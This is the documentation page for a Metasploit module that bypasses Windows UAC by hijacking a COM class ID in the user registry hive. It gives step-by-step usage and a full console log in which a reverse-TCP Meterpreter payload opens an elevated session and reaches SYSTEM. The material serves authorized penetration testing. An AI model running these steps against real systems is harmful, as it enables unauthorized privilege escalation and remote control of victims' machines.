adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/exploit/windows/local/bypassuac_comhijack.md
T
h00die c904b9d2f2 scenario to scenarios
2020-01-16 10:36:38 -05:00

116 lines
4.7 KiB
Markdown
Raw Blame History

## Introduction
This module will bypass UAC on Windows 7 through to 10 RS3 by hijacking a COM Class ID
that is located in the current user hive. This key contains a reference to a DLL that
contains a chosen payload. Multiple COM vectors are defined in this module and one is
chosen at random at runtime.
The module modifies the registry in order for this exploit to work. The modification is
reverted once the exploitation attempt has finished.
This module requires that the payload architecture matches the target operating system
architecture. This is due to the fact that the underlying binaries that are invoked
match the system architecture.
If a custom DLL is to be used with `EXE::Custom`, that DLL must match the system
architecture, and should call `ExitProcess()` after starting the payload in a
different process.
## Usage
1. Create a session on the target system under the context of a local administrative user.
1. Begin interacting with the module: `use exploit/windows/local/bypassuac_comhijack`.
1. Set the `PAYLOAD` and configure it correctly, making sure the architecture is correct.
1. If an existing handler is configured to receive the elevated session, then the module's
handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.
## Scenarios
```
msf exploit(bypassuac_comhijack) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-5A73R51
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac_comhijack) > options
Module options (exploit/windows/local/bypassuac_comhijack):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST xxx.xx.255.1 yes The listen address
LPORT 8443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(bypassuac_comhijack) > run
[*] [2017.08.16-12:58:31] UAC is Enabled, checking level...
[+] [2017.08.16-12:58:31] Part of Administrators group! Continuing...
[+] [2017.08.16-12:58:32] UAC is set to Default
[+] [2017.08.16-12:58:32] BypassUAC can bypass this setting, continuing...
[*] [2017.08.16-12:58:33] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] [2017.08.16-12:58:33] Uploading payload to C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll ...
[*] [2017.08.16-12:58:33] Executing high integrity process ...
[*] [2017.08.16-12:58:34] Sending stage (1188415 bytes) to xxx.xx.255.159
[*] Meterpreter session 2 opened (xxx.xx.255.1:8443 -> xxx.xx.255.159:51480) at 2017-08-16 12:58:35 +1000
[*] [2017.08.16-12:58:38] Cleaining up registry ...
[!] [2017.08.16-12:58:39] This exploit may require manual cleanup of 'C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll' on the target
msf exploit(bypassuac_comhijack) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
2 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51480 (xxx.xx.255.159)
msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 2...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Reference in New Issue View Git Blame Copy Permalink